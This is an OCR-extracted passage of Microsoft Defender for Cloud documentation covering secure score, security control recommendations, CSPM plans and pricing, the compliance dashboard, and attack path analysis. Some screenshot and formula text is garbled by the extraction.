

Additional best practices 


Potential score increase 


+ 9% (6 points) 
+ 9% (5 points) 
+ 6% (3 points) 
+ 4% (2 points) 
+ 3% (2 points) 
+ 3% (2 points) 
+ 3% (2 points) 
+ 3% (2 points) 
+ 2% (1 point) 
+ 2% (1 point) 
+ 1% (1 point) 
+ 1% (1 point) 
+ 1% (1 point) 
+ 0% (0 points) 


+ 0% (0 points) 


subscription being replaced by the word connector. 


Metric Formula and example 


Secure score 


Multiple o ¥ (subscription score x subscription weight) 
KE Secure score multiple subscriptions = — EE for all subscriptions x 100 
subscriptions, eights for all subscriptions 
and 
connectors The combined score for multiple subscriptions and connectors includes a weight 


for each subscription, and connector. The relative weights for your subscriptions, 
and connectors are determined by Defender for Cloud based on factors such as 
the number of resources. 

The current score for each subscription, a dn connector is calculated in the same 
way as for a single subscription, or connector, but then the weight is applied as 
shown in the equation. 

When you view multiple subscriptions and connectors, the secure score evaluates 
all resources within all enabled policies and groups their combined impact on 
each security control's maximum score. 


All environments 


Secure score Environment 


d b 
14 total Tr 359/683 y= 92 
& azure 72% rai Unhealthy resources Recommendations 
I subsciptions 1 I Accounts 7 I Projects 6 
ZN aws 30% 
SECU 
& cep 37% 


The combined score is not an average; rather it's the evaluated posture of the 
status of all resources across all subscriptions, and connectors. 


Here too, if you go to the recommendations page and add up the potential 
points available, you'll find that it's the difference between the current score (22) 
and the maximum score available (58). 


Which recommendations are included in the secure score 
calculations? 


Only built-in recommendations that are part of the default initiative, Azure Security 
Benchmark, have an impact on the secure score. Recommendations flagged as Preview 
aren't included in the calculations of your secure score. They should still be remediated 
wherever possible, so that when the preview period ends they'll contribute towards your 
score. 


Preview recommendations are marked with: H 


Improve your secure score 


To improve your secure score, remediate security recommendations from your 
recommendations list. You can remediate each recommendation manually for each 


resource, or use the Fix option (when available) to resolve an issue on multiple resources 


quickly. For more information, see Remediate recommendations. 


You can also configure the Enforce and Deny options on the relevant recommendations 
to improve your score and make sure your users don't create resources that negatively 
impact your score. 


Security controls and their recommendations 


The table below lists the security controls in Microsoft Defender for Cloud. For each 
control, you can see the maximum number of points you can add to your secure score if 


you remediate all of the recommendations listed in the control, for all of your resources. 


The set of security recommendations provided with Defender for Cloud is tailored to the 
available resources in each organization's environment. You can disable 
recommendations and exempt specific resources from a recommendation to further 


customize the recommendations. 


We recommend every organization carefully reviews their assigned Azure Policy 
initiatives. 


Q Tip 


For details about reviewing and editing your initiatives, see manage security 


policies. 


Even though Defender for Cloud's default security initiative, the Azure Security 
Benchmark, is based on industry best practices and standards, there are scenarios in 
which the built-in recommendations listed below might not completely fit your 
organization. It's sometimes necessary to adjust the default initiative - without 
compromising security - to ensure it's aligned with your organization's own policies, 


industry standards, regulatory standards, and benchmarks. 


Secure Security control and description Recommendations 
score 


Secure 
score 


10 


Security control and description 


Enable MFA - Defender for 
Cloud places a high value on 
multi-factor authentication 
(MFA). Use these 
recommendations to secure the 
users of your subscriptions. 
There are three ways to enable 
MFA and be compliant with the 
recommendations: security 
defaults, per-user assignment, 
conditional access policy. Learn 
more about these options in 
Manage MFA enforcement on 
your subscriptions. 


Secure management ports - 
Brute force attacks often target 
management ports. Use these 
recommendations to reduce 
your exposure with tools like 
just-in-time VM access and 
network security groups. 


Apply system updates - Not 
applying updates leaves 
unpatched vulnerabilities and 
results in environments that are 
susceptible to attacks. Use these 
recommendations to maintain 
operational efficiency, reduce 
security vulnerabilities, and 
provide a more stable 
environment for your end users. 
To deploy system updates, you 
can use the Update 
Management solution to 
manage patches and updates for 
your machines. 


Recommendations 


- Accounts with owner permissions on Azure 
resources should be MFA enabled 

- Accounts with write permissions on Azure 
resources should be MFA enabled 

- MFA should be enabled on accounts with owner 
permissions on subscriptions 

- MFA should be enabled on accounts with write 
permissions on subscriptions 


- Internet-facing virtual machines should be 
protected with network security groups 

- Management ports of virtual machines should be 
protected with just-in-time network access control 
- Management ports should be closed on your 
virtual machines 


- Log Analytics agent should be installed on Linux- 
based Azure Arc-enabled machines 

- Log Analytics agent should be installed on virtual 
machine scale sets 

- Log Analytics agent should be installed on virtual 
machines 

- Log Analytics agent should be installed on 
Windows-based Azure Arc-enabled machines 

- System updates on virtual machine scale sets 
should be installed 

- System updates should be installed on your 
machines 

- System updates should be installed on your 
machines (powered by Update Center) 


Secure 
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Security control and description 


Remediate vulnerabilities - 
Defender for Cloud includes 
multiple vulnerability assessment 
scanners to check your 
machines, databases, and 
container registries for 
weaknesses that threat actors 
might leverage. Use these 
recommendations to enable 
these scanners and review their 
findings. 

Learn more about scanning 
machines, SQL servers, and 
container registries. 


Recommendations 


- Azure Arc-enabled Kubernetes clusters should 
have the Azure Policy extension installed 

- Azure Kubernetes Service clusters should have the 
Azure Policy add-on for Kubernetes installed 

- Code repositories should have code scanning 
findings resolved 

- Code repositories should have Dependabot 
scanning findings resolved 

- Code repositories should have infrastructure as 
code scanning findings resolved 

- Code repositories should have secret scanning 
findings resolved 

- Container images should be deployed from trusted 
registries only 

- Container registry images should have vulnerability 
findings resolved 

- Function apps should have vulnerability findings 
resolved 

- Kubernetes clusters should gate deployment of 
vulnerable images 

- Machines should have a vulnerability assessment 
solution 

- Machines should have vulnerability findings 
resolved 

- Running container images should have 
vulnerability findings resolved 


Secure 
score 


4 


Security control and description 


Remediate security 
configurations - Misconfigured 
IT assets have a higher risk of 
being attacked. Use these 
recommendations to harden the 
identified misconfigurations 
across your infrastructure. 


Manage access and permissions 
- A core part of a security 
program is ensuring your users 
have the necessary access to do 
their jobs but no more than that: 
the least privilege access model. 
Use these recommendations to 
manage your identity and access 
requirements. 


Recommendations 


- Azure Arc-enabled Kubernetes clusters should 
have the Azure Policy extension installed 

- Azure DevOps security posture findings should be 
resolved 

- Azure Kubernetes Service clusters should have the 
Azure Policy add-on for Kubernetes installed 

- Containers should only use allowed AppArmor 
profiles 

- Log Analytics agent should be installed on Linux- 
based Azure Arc-enabled machines 

- Log Analytics agent should be installed on virtual 
machine scale sets 

- Log Analytics agent should be installed on virtual 
machines 

- Log Analytics agent should be installed on 
Windows-based Azure Arc-enabled machines 

- Machines should be configured securely 

- SQL databases should have vulnerability findings 
resolved 

- SQL managed instances should have vulnerability 
assessment configured 

- SQL servers on machines should have vulnerability 
findings resolved 

- SQL servers should have vulnerability assessment 
configured 

- Virtual machine scale sets should be configured 
securely 

- Vulnerabilities in security configuration on your 
Linux machines should be remediated (powered by 
Guest Configuration) 

- Vulnerabilities in security configuration on your 
Windows machines should be remediated (powered 
by Guest Configuration) 


- Authentication to Linux machines should require 
SSH keys 

- Azure Arc-enabled Kubernetes clusters should 
have the Azure Policy extension installed 

- Azure Cosmos DB accounts should use Azure 
Active Directory as the only authentication method 
- Azure Kubernetes Service clusters should have the 
Azure Policy add-on for Kubernetes installed 

- Blocked accounts with owner permissions on Azure 
resources should be removed 

- Blocked accounts with read and write permissions 
on Azure resources should be remove 


Secure 
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Recommendations 


- Container with privilege escalation should be 
avoided 

- Containers sharing sensitive host namespaces 
should be avoided 

- Deprecated accounts should be removed from 
subscriptions 

- Deprecated accounts with owner permissions 
should be removed from subscriptions 

- External accounts with owner permissions should 
be removed from subscriptions 

- External accounts with write permissions should be 
removed from subscriptions 

- Function apps should have Client Certificates 
(Incoming client certificates) enabled 

- Guest accounts with owner permissions on Azure 
resources should be removed 

- Guest accounts with write permissions on Azure 
resources should be removed 

- Guest Configuration extension should be installed 
on machines 

- Immutable (read-only) root filesystem should be 
enforced for containers 

- Least privileged Linux capabilities should be 
enforced for containers 

- Managed identity should be used in API apps 

- Managed identity should be used in function apps 
- Managed identity should be used in web apps 

- Privileged containers should be avoided 

- Role-Based Access Control should be used on 
Kubernetes Services 

- Running containers as root user should be avoided 
- Service Fabric clusters should only use Azure Active 
Directory for client authentication 

- Storage account public access should be 
disallowed 

- Usage of pod HostPath volume mounts should be 
restricted to a known list to restrict node access 
from compromised containers 

- Virtual machines' Guest Configuration extension 
should be deployed with system-assigned managed 
identity 


Secure 
score 


4 


Security control and description 


Enable encryption at rest - Use 
these recommendations to 
ensure you mitigate 
misconfigurations around the 
protection of your stored data. 


Encrypt data in transit - Use 
these recommendations to 
secure data that’s moving 
between components, locations, 
or programs. Such data is 
susceptible to man-in-the- 
middle attacks, eavesdropping, 
and session hijacking. 


Restrict unauthorized network 
access - Azure offers a suite of 
tools designed to ensure 
accesses across your network 
meet the highest security 
standards. 

Use these recommendations to 
manage Defender for Cloud's 
adaptive network hardening 
settings, ensure you've 
configured Azure Private Link for 
all relevant PaaS services, enable 
Azure Firewall on your virtual 
networks, and more. 


Recommendations 


- Service Fabric clusters should have the 
ClusterProtectionLevel property set to 
EncryptAndSign 

- Transparent Data Encryption on SQL databases 
should be enabled 

- Virtual machines should encrypt temp disks, 
caches, and data flows between Compute and 
Storage resources 


- API App should only be accessible over HTTPS 
- Enforce SSL connection should be enabled for 
MySQL database servers 

- Enforce SSL connection should be enabled for 
PostgreSQL database servers 

- FTPS should be required in API apps 

- FTPS should be required in function apps 

- FTPS should be required in web apps 

- Function App should only be accessible over 
HTTPS 

- Redis Cache should allow access only via SSL 

- Secure transfer to storage accounts should be 
enabled 

- TLS should be updated to the latest version for API 
apps 

- TLS should be updated to the latest version for 
function apps 

- TLS should be updated to the latest version for 
web apps 

- Web Application should only be accessible over 
HTTPS 


- Adaptive network hardening recommendations 
should be applied on internet facing virtual 
machines 

- All network ports should be restricted on network 
security groups associated to your virtual machine 

- App Configuration should use private link 

- Azure Arc-enabled Kubernetes clusters should 
have the Azure Policy extension installed 

- Azure Cache for Redis should reside within a virtual 
network 

- Azure Event Grid domains should use private link 
- Azure Event Grid topics should use private link 

- Azure Kubernetes Service clusters should have the 
Azure Policy add-on for Kubernetes installed 

- Azure Machine Learning workspaces should use 
private link 


Secure Security control and description Recommendations 
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- Azure SignalR Service should use private link 

- Azure Spring Cloud should use network injection 
- Container registries should not allow unrestricted 
network access 

- Container registries should use private link 

- CORS should not allow every resource to access 
API Apps 

- CORS should not allow every resource to access 
Function Apps 

- CORS should not allow every resource to access 
Web Applications 

- Firewall should be enabled on Key Vault 

- Internet-facing virtual machines should be 
protected with network security groups 

- IP forwarding on your virtual machine should be 
disabled 

- Kubernetes API server should be configured with 
restricted access 

- Private endpoint should be configured for Key 
Vault 

- Private endpoint should be enabled for MariaDB 
servers 

- Private endpoint should be enabled for MySQL 
servers 

- Private endpoint should be enabled for PostgreSQL 
servers 

- Public network access should be disabled for 
MariaDB servers 

- Public network access should be disabled for 
MySQL servers 

- Public network access should be disabled for 
PostgreSQL servers 

- Services should listen on allowed ports only 

- Storage account should use a private link 
connection 

- Storage accounts should restrict network access 
using virtual network rules 

- Usage of host networking and ports should be 
restricted 

- Virtual networks should be protected by Azure 
Firewall 

- VM Image Builder templates should use private 
link 
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Apply adaptive application 
control - Adaptive application 
control is an intelligent, 
automated, end-to-end solution 
to control which applications can 
run on your machines. It also 
helps to harden your machines 
against malware. 


Protect applications against 
DDoS attacks - Azure's 
advanced networking security 
solutions include Azure DDoS 
Protection, Azure Web 
Application Firewall, and the 
Azure Policy Add-on for 
Kubernetes. Use these 
recommendations to ensure 
your applications are protected 
with these tools and others. 


Enable endpoint protection - 
Defender for Cloud checks your 
organization's endpoints for 
active threat detection and 
response solutions such as 
Microsoft Defender for Endpoint 
or any of the major solutions 
shown in this list. 

When an Endpoint Detection 
and Response (EDR) solution 
isn't found, you can use these 
recommendations to deploy 
Microsoft Defender for Endpoint 
(included as part of Microsoft 
Defender for servers). 

Other recommendations in this 
control help you deploy the Log 
Analytics agent and configure 
file integrity monitoring. 


Recommendations 


- Adaptive application controls for defining safe 
applications should be enabled on your machines 

- Allowlist rules in your adaptive application control 
policy should be updated 

- Log Analytics agent should be installed on Linux- 
based Azure Arc-enabled machines 

- Log Analytics agent should be installed on virtual 
machines 

- Log Analytics agent should be installed on 
Windows-based Azure Arc-enabled machines 


- Azure Arc-enabled Kubernetes clusters should 
have the Azure Policy extension installed 

- Azure DDoS Protection Standard should be 
enabled 

- Azure Kubernetes Service clusters should have the 
Azure Policy add-on for Kubernetes installed 

- Container CPU and memory limits should be 
enforced 

- Web Application Firewall (WAF) should be enabled 
for Application Gateway 

- Web Application Firewall (WAF) should be enabled 
for Azure Front Door Service service 


- Endpoint protection health issues on machines 
should be resolved 

- Endpoint protection health issues on machines 
should be resolved 

- Endpoint protection health issues on virtual 
machine scale sets should be resolved 

- Endpoint protection should be installed on 
machines 

- Endpoint protection should be installed on 
machines 

- Endpoint protection should be installed on virtual 
machine scale sets 

- Install endpoint protection solution on virtual 
machines 

- Log Analytics agent should be installed on Linux- 
based Azure Arc-enabled machines 

- Log Analytics agent should be installed on virtual 
machine scale sets 

- Log Analytics agent should be installed on virtual 
machines 

- Log Analytics agent should be installed on 
Windows-based Azure Arc-enabled machines 
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Enable auditing and logging - 
Detailed logs are a crucial part of 
incident investigations and many 
other troubleshooting 
operations. The 
recommendations in this control 
focus on ensuring you've 
enabled diagnostic logs 
wherever relevant. 


Recommendations 


- Auditing on SQL server should be enabled 

- Diagnostic logs in App Service should be enabled 
- Diagnostic logs in Azure Data Lake Store should be 
enabled 

- Diagnostic logs in Azure Stream Analytics should 
be enabled 

- Diagnostic logs in Batch accounts should be 
enabled 

- Diagnostic logs in Data Lake Analytics should be 
enabled 

- Diagnostic logs in Event Hub should be enabled 
- Diagnostic logs in Key Vault should be enabled 

- Diagnostic logs in Kubernetes services should be 
enabled 

- Diagnostic logs in Logic Apps should be enabled 
- Diagnostic logs in Search services should be 
enabled 

- Diagnostic logs in Service Bus should be enabled 
- Diagnostic logs in Virtual Machine Scale Sets 
should be enabled 


Secure 
score 


Security control and description 


Enable enhanced security 
features - Use these 
recommendations to enable any 
of the enhanced security 
features plans. 


Implement security best 
practices - This control has no 
impact on your secure score. For 
that reason, it's a collection of 
recommendations which are 
important to fulfil for the sake of 
your organization's security, but 
which we feel shouldn't be a part 
of how you assess your overall 
score. 


Recommendations 


- Azure Arc-enabled Kubernetes clusters should 
have the Defender extension installed 

- Azure Kubernetes Service clusters should have 
Defender profile enabled 

- File integrity monitoring should be enabled on 
machines 

- GitHub repositories should have Code scanning 
enabled 

- GitHub repositories should have Dependabot 
scanning enabled 

- GitHub repositories should have Secret scanning 
enabled 

- Microsoft Defender for App Service should be 
enabled 

- Microsoft Defender for Azure SQL Database 
servers should be enabled 

- Microsoft Defender for Containers should be 
enabled 

- Microsoft Defender for DNS should be enabled 

- Microsoft Defender for Key Vault should be 
enabled 

- Microsoft Defender for open-source relational 
databases should be enabled 

- Microsoft Defender for Resource Manager should 
be enabled 

- Microsoft Defender for servers should be enabled 
- Microsoft Defender for servers should be enabled 
on workspaces 

- Microsoft Defender for SQL on machines should be 
enabled on workspaces 

- Microsoft Defender for SQL servers on machines 
should be enabled 

- Microsoft Defender for Storage should be enabled 


- [Enable if required] Azure Cosmos DB accounts 
should use customer-managed keys to encrypt data 
at rest 

- [Enable if required] Azure Machine Learning 
workspaces should be encrypted with a customer- 
managed key (CMK) 

- [Enable if required] Cognitive Services accounts 
should enable data encryption with a customer- 
managed key (CMK) 

- [Enable if required] Container registries should be 
encrypted with a customer-managed key (CMK) 

- [Enable if required] MySQL servers should use 
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Recommendations 


customer-managed keys to encrypt data at rest 

- [Enable if required] PostgreSQL servers should use 
customer-managed keys to encrypt data at rest 

- [Enable if required] SQL managed instances should 
use customer-managed keys to encrypt data at rest 
- [Enable if required] SQL servers should use 
customer-managed keys to encrypt data at rest 

- [Enable if required] Storage accounts should use 
customer-managed key (CMK) for encryption 

- Amaximum of 3 owners should be designated for 
subscriptions 

- Access to storage accounts with firewall and virtual 
network configurations should be restricted 

- Accounts with read permissions on Azure 
resources should be MFA enabled 

- All advanced threat protection types should be 
enabled in SQL managed instance advanced data 
security settings 

- All advanced threat protection types should be 
enabled in SQL server advanced data security 
settings 

- API Management services should use a virtual 
network 

- Audit retention for SQL servers should be set to at 
least 90 days 

- Auto provisioning of the Log Analytics agent 
should be enabled on subscriptions 

- Automation account variables should be encrypted 
- Azure Backup should be enabled for virtual 
machines 

- Azure Cosmos DB accounts should have firewall 
rules 

- Cognitive Services accounts should enable data 
encryption 

- Cognitive Services accounts should restrict network 
access 

- Cognitive Services accounts should use customer 
owned storage or enable data encryption 

- Container hosts should be configured securely 

- Default IP Filter Policy should be Deny 

- Diagnostic logs in loT Hub should be enabled 

- Email notification for high severity alerts should be 
enabled 

- Email notification to subscription owner for high 
severity alerts should be enabled 

- Ensure API app has Client Certificates Incoming 
client certificates set to On 
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Recommendations 


- External accounts with read permissions should be 
removed from subscriptions 

- Geo-redundant backup should be enabled for 
Azure Database for MariaDB 

- Geo-redundant backup should be enabled for 
Azure Database for MySQL 

- Geo-redundant backup should be enabled for 
Azure Database for PostgreSQL 

- Guest accounts with read permissions on Azure 
resources should be removed 

- Guest Attestation extension should be installed on 
supported Linux virtual machine scale sets 

- Guest Attestation extension should be installed on 
supported Linux virtual machines 

- Guest Attestation extension should be installed on 
supported Windows virtual machine scale sets 

- Guest Attestation extension should be installed on 
supported Windows virtual machines 

- Guest Configuration extension should be installed 
on machines 

- Identical Authentication Credentials 

- IP Filter rule large IP range 

- Java should be updated to the latest version for 
API apps 

- Java should be updated to the latest version for 
function apps 

- Java should be updated to the latest version for 
web apps 

- Key Vault keys should have an expiration date 

- Key Vault secrets should have an expiration date 

- Key vaults should have purge protection enabled 
- Key vaults should have soft delete enabled 

- Kubernetes clusters should be accessible only over 
HTTPS 

- Kubernetes clusters should disable automounting 
API credentials 

- Kubernetes clusters should not grant 
CAPSYSADMIN security capabilities 

- Kubernetes clusters should not use the default 
namespace 

- Linux virtual machines should enforce kernel 
module signature validation 

- Linux virtual machines should use only signed and 
trusted boot components 

- Linux virtual machines should use Secure Boot 

- Machines should be restarted to apply security 
configuration updates 
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Recommendations 


- Machines should have ports closed that might 
expose attack vectors 

- MFA should be enabled on accounts with read 
permissions on subscriptions 

- Microsoft Defender for SQL should be enabled for 
unprotected Azure SQL servers 

- Microsoft Defender for SQL should be enabled for 
unprotected SQL Managed Instances 

- Network Watcher should be enabled 

- Non-internet-facing virtual machines should be 
protected with network security groups 

- Over-provisioned identities in subscriptions should 
be investigated to reduce the Permission Creep 
Index (PCI) 

- PHP should be updated to the latest version for 
API apps 

- PHP should be updated to the latest version for 
web apps 

- Private endpoint connections on Azure SQL 
Database should be enabled 

- Public network access on Azure SQL Database 
should be disabled 

- Public network access should be disabled for 
Cognitive Services accounts 

- Python should be updated to the latest version for 
API apps 

- Python should be updated to the latest version for 
function apps 

- Python should be updated to the latest version for 
web apps 

- Remote debugging should be turned off for API 
App 

- Remote debugging should be turned off for 
Function App 

- Remote debugging should be turned off for Web 
Applications 

- Secure Boot should be enabled on supported 
Windows virtual machines 

- SQL servers should have an Azure Active Directory 
administrator provisioned 

- Storage accounts should be migrated to new Azure 
Resource Manager resources 

- Subnets should be associated with a network 
security group 

- Subscriptions should have a contact email address 
for security issues 

- There should be more than one owner assigned to 
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Next steps 


Recommendations 


subscriptions 

- Validity period of certificates stored in Azure Key 
Vault should not exceed 12 months 

- Virtual machines guest attestation status should be 
healthy 

- Virtual machines' Guest Configuration extension 
should be deployed with system-assigned managed 
identity 

- Virtual machines should be migrated to new Azure 
Resource Manager resources 

- vTPM should be enabled on supported virtual 
machines 

- Web apps should request an SSL certificate for all 
incoming requests 

- Windows Defender Exploit Guard should be 
enabled on machines 

- Windows web servers should be configured to use 
secure communication protocols 


This article described the secure score and the included security controls. 


Access and track your secure score 


For related material, see the following articles: 


e Learn about the different elements of a recommendation 


e Learn how to remediate recommendations 


e View the GitHub-based tools for working programmatically with secure score Z 


e Check out common questions about secure score. 


Cloud Security Posture Management 
(CSPM) 


Article e 08/15/2023 


One of Microsoft Defender for Cloud's main pillars for cloud security is Cloud Security 
Posture Management (CSPM). CSPM provides you with hardening guidance that helps 
you efficiently and effectively improve your security. CSPM also gives you visibility into 


your current security situation. 


Defender for Cloud continually assesses your resources, subscriptions and organization 
for security issues. Defender for Cloud shows your security posture in secure score. The 
secure score is an aggregated score of the security findings that tells you your current 
security situation. The higher the score, the lower the identified risk level. 


Prerequisites 


e Foundational CSPM - None 

e Defender Cloud Security Posture Management (CSPM) - Agentless scanning 
requires the Subscription Owner to enable the plan. Anyone with a lower level of 
authorization can enable the Defender CSPM plan but the agentless scanner won't 
be enabled by default due to lack of permissions. Attack path analysis and security 
explorer won't be populated with vulnerabilities because the agentless scanner is 
disabled. 


For commercial and national cloud coverage, review features supported in different 


Azure cloud environments. 


Defender CSPM plan options 


Defender for Cloud offers foundational multicloud CSPM capabilities for free. These 
capabilities are automatically enabled by default on any subscription or account that has 
onboarded to Defender for Cloud. The foundational CSPM includes asset discovery, 
continuous assessment and security recommendations for posture hardening, 
compliance with Microsoft Cloud Security Benchmark (MCSB), and a Secure score which 


measure the current status of your organization's posture. 


The optional Defender CSPM plan, provides advanced posture management capabilities 
such as Attack path analysis, Cloud security explorer, advanced threat hunting, security 
governance capabilities, and also tools to assess your security compliance with a wide 


range of benchmarks, regulatory standards, and any custom security policies required in 
your organization, industry, or region. 


Plan pricing 


Microsoft Defender CSPM protects across all your multicloud workloads, but billing only 
applies for Servers, Database, and Storage accounts at $5/billable resource/month. The 
underlying compute services for AKS are regarded as servers for billing purposes. 


O Note 


e The Microsoft Defender CSPM plan protects across multicloud workloads. 
With Defender CSPM generally available (GA), the plan will remain free until 
billing starts on August 1, 2023. Billing will apply for Servers, Database, and 
Storage resources. Billable workloads will be VMs, Storage accounts, OSS DBs, 


SQL PaaS, & SQL servers on machines. 


e This price includes free vulnerability assessments for 20 unique images per 
charged resource, whereby the count will be based on the previous month's 
consumption. Every subsequent scan will be charged at $0.29 per image 
digest. The majority of customers are not expected to incur any additional 
image scan charges. For subscriptions that are both under the Defender CSPM 
and Defender for Containers plans, free vulnerability assessment will be 
calculated based on free image scans provided via the Defender for 
Containers plan, as specified in the Microsoft Defender for Cloud pricing 


page”. 


Plan availability 
Learn more about Defender CSPM pricing Z. 


The following table summarizes each plan and their cloud availability. 


Feature Foundational Defender Cloud availability 
CSPM CSPM 
Security recommendations to fix OO OO Azure, AWS, GCP, 


misconfigurations and weaknesses on-premises 


Feature 


Asset inventory 


Secure score 


Data visualization and reporting with 


Azure Workbooks 


Data exporting 


Workflow automation 


Tools for remediation 


Microsoft Cloud Security Benchmark 


Governance 


Regulatory compliance 


Cloud security explorer 

Attack path analysis 

Agentless scanning for machines 
Agentless discovery for Kubernetes 


Container registries vulnerability 


assessment, including registry scanning 


Data aware security posture 


EASM insights in network exposure 


O Note 


Foundational 
CSPM 


Defender 
CSPM 


Cloud availability 


Azure, AWS, GCP, 
on-premises 


Azure, AWS, GCP, 
on-premises 


Azure, AWS, GCP, 
on-premises 


Azure, AWS, GCP, 
on-premises 


Azure, AWS, GCP, 
on-premises 


Azure, AWS, GCP, 
on-premises 


Azure, AWS, GCP 


Azure, AWS, GCP, 
on-premises 


Azure, AWS, GCP, 
on-premises 


Azure, AWS, GCP 
Azure, AWS, GCP 
Azure, AWS, GCP 
Azure 


Azure 


Azure, AWS, GCP 


Azure, AWS, GCP 


If you have enabled Defender for DevOps, you will only gain cloud security graph 


and attack path analysis to the artifacts that arrive through those connectors. 


To enable Governance for DevOps related recommendations, the Defender CSPM 
plan needs to be enabled on the Azure subscription that hosts the DevOps 
connector. 


Next steps 


Learn about Defender for Cloud's Defender plans. 


Microsoft cloud security benchmark in 
Defender for Cloud 
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Microsoft Defender for Cloud streamlines the process for meeting regulatory 
compliance requirements, using the regulatory compliance dashboard. Defender for 
Cloud continuously assesses your hybrid cloud environment to analyze the risk factors 
according to the controls and best practices in the standards that you've applied to your 
subscriptions. The dashboard reflects the status of your compliance with these 


standards. 


The Microsoft cloud security benchmark (MCSB) is automatically assigned to your 
subscriptions and accounts when you onboard Defender for Cloud. This benchmark 
builds on the cloud security principles defined by the Azure Security Benchmark and 
applies these principles with detailed technical implementation guidance for Azure, for 
other cloud providers (such as AWS and GCP), and for other Microsoft clouds. 


Security Security 


Azure benchmark benchmark Microsoft 


Cloud 
Security 
Benchmark 


Security for other for other 
Benchmark cloud Microsoft 
providers clouds 


The compliance dashboard gives you a view of your overall compliance standing. 
Security for non-Azure platforms follows the same cloud-neutral security principles as 
Azure. Each control within the benchmark provides the same granularity and scope of 
technical guidance across Azure and other cloud resources. 


Home > Microsoft Defender for Cloud 


E Microsoft Defender for Cloud | Regulatory compliance #2 


showing 
[E Search « 


General 


© overview 

E Getting started 
Z= Recommendations 
@ Security alerts 

@ inventory 

E Security explorer 
@ Workbooks 

2 Community 


© Diagnose and solve problems 


Cloud security 
© Secure score 

DO Regulatory compliance 
D Azure Defender 


S% Firewall manager 


Management 
I Environment settings 
E Security solution 


5 Workflow automation 


L Downioadreport E Manage compliance polices E Open query E Create compliance workbooks [Ê] Audit reports 


© You can now fully customize the standards you track in the dashboard. Update your dashborad by selecting “Manage compliance policies” above > 


‘Azure Security Benchmark Lowest compliance regulatory standards 
3 of 43 passed controls Soc TSP 
erea — 


NIST SP 800 53 R5 
pa 


UKO and UJ NHS 
a 


PCI DSS 3.2.1 
= 


AMO 


7/58 


Ww 


8/43 


Microsoft Cloud Security Benchmark v3 PCI DSS 3.2.1 SOC TSP HIPAAHITRUST NIST SP 80NIST SP 800 IK UKO and UJNHS Canada Federal PBMM 


Audit reports (Preview) 


Stay up to date on the latest privacy, 
security, and compliance-related 
information for Microsoft's cloud services. 


Environments: @ Azure @ AWS peo 


Under each applicable compliance control is the set of assessments run by Defender for Cloud that are associated with that control. If they are all green, it means those assessments are currently passing: this does not ensure you are fully compliant with that control, Furthermore, not all controls for 


any particular regulation are covered by Defender for Cloud assessments, and therefore this report is only a partial view of your overall compliance status. 


Azure Security Benchmark is applied to 7 su 


[ Expand all compliance controls 


Controls TL 

V @ NS.Network Security 

\ @ IMidentity Management 

V @ PAPrivileged Access 

A @ DP.Data Protection 
ve 


V @ DP-2. Monitor anomalies and threats targeting sensitive data Control details [ms] [< 


V © DP-3. Encrypt sensitive data in transit Control details [ws] [€ 


e @ DP-4. Enable data at rest encryption by default Control details [ws | [c ] 


Automated assessments -Azure 


Virtual machines should encrypt temp disks, caches, and data flows between Compute and Storage resources 
‘Automation account variables should be encrypted 
Service Fabric clusters should have the ClusterProtectionLevel property set to EncryptAndSign 


Transparent Data Encryption on SQL databases should be enabled 


Automated assessments -AWS | c | 


Attached EBS volumes shouldbe encrypted at-est 
EBS default encryption should be enabled 
Amazon SOS queues should be encrypted at rest EEE 


A @ DP-5. Use customer-managed key option in data at rest encryption when required Control details [ms] 


‘A @ DP-6. Use a secure key management process Control details [w=] [ 


© @ DP-7. Use a secure certificate management process Control details 


Resource type 
EA Virtual machines 

XC Automation account variables 
Cy Service fabric clusters 


S SAL databases 


‘AWS EC2 Volumes 
Tn AWS Sts Account in Regions 


$ AES SQS Queues 
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Resource compliance status 


From the compliance dashboard, you're able to manage all of your compliance 


requirements for your cloud deployments, including automatic, manual and shared 
responsibilities. 


GO Note 


Shared responsibilities is only compatible with Azure. 


ext steps 


e Improve your regulatory compliance 


e Customize the set of standards in your regulatory compliance dashboard 


Identify and analyze risks across your 
environment 
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One of the biggest challenges that security teams face today is the number of security 
issues they face on a daily basis. There are numerous security issues that need to be 


resolved and never enough resources to address them all. 


Defender for Cloud's contextual security capabilities assists security teams to assess the 
risk behind each security issue, and identify the highest risk issues that need to be 
resolved soonest. Defender for Cloud assists security teams to reduce the risk of an 
impactful breach to their environment in the most effective way. 


All of these capabilities are available as part of the Defender Cloud Security Posture 
Management plan and require you to enable either agentless scanning for VMs or the 
vulnerability assessment capability on the Defender for Servers plan. 


What is cloud security graph? 


The cloud security graph is a graph-based context engine that exists within Defender for 
Cloud. The cloud security graph collects data from your multicloud environment and 
other data sources. For example, the cloud assets inventory, connections and lateral 
movement possibilities between resources, exposure to internet, permissions, network 
connections, vulnerabilities and more. The data collected is then used to build a graph 
representing your multicloud environment. 


Defender for Cloud then uses the generated graph to perform an attack path analysis 
and find the issues with the highest risk that exist within your environment. You can also 
query the graph using the cloud security explorer. 
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What is attack path analysis? 


Attack path analysis is a graph-based algorithm that scans the cloud security graph. The 
scans expose exploitable paths that attackers may use to breach your environment to 
reach your high-impact assets. Attack path analysis exposes attack paths and suggests 
recommendations as to how best remediate issues that will break the attack path and 
prevent successful breach. 


When you take your environment's contextual information into account, attack path 
analysis identifies issues that may lead to a breach on your environment, and helps you 


to remediate the highest risk ones first. For example its exposure to the internet, 


permissions, lateral movement, and more. 


GA. oy HEI. Sa 


Attacker Vulnerability Sensitive data 
(CVE-5436-4223) 


Learn how to use attack path analysis. 


What is cloud security explorer? 


By running graph-based queries on the cloud security graph with the cloud security 
explorer, you can proactively identify security risks in your multicloud environments. 
Your security team can use the query builder to search for and locate risks, while taking 
your organization's specific contextual and conventional information into account. 


Cloud security explorer provides you with the ability to perform proactive exploration 
features. You can search for security risks within your organization by running graph- 
based path-finding queries on top the contextual security data that is already provided 
by Defender for Cloud, such as cloud misconfigurations, vulnerabilities, resource context, 
lateral movement possibilities between resources and more. 


Learn how to use the cloud security explorer, or check out the cloud security graph 
components list. 


Next steps 


e Identify and remediate attack paths 
e Enabling agentless scanning for machines 
e Build a query with the cloud security explorer 


What is an external attack surface? 
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An external attack surface is the entire area of an organization or system that is 
susceptible to an attack from an external source. An organization's attack surface is 
made up of all the points of access that an unauthorized person could use to enter their 
system. The larger your attack surface is, the harder it's to protect. 


You can use Defender for Cloud's new integration with Microsoft Defender External 
Attack Surface Management (Defender EASM), to improve your organization's security 
posture and reduce the potential risk of being attacked. Defender EASM continuously 
discovers and maps your digital attack surface to provide an external view of your online 
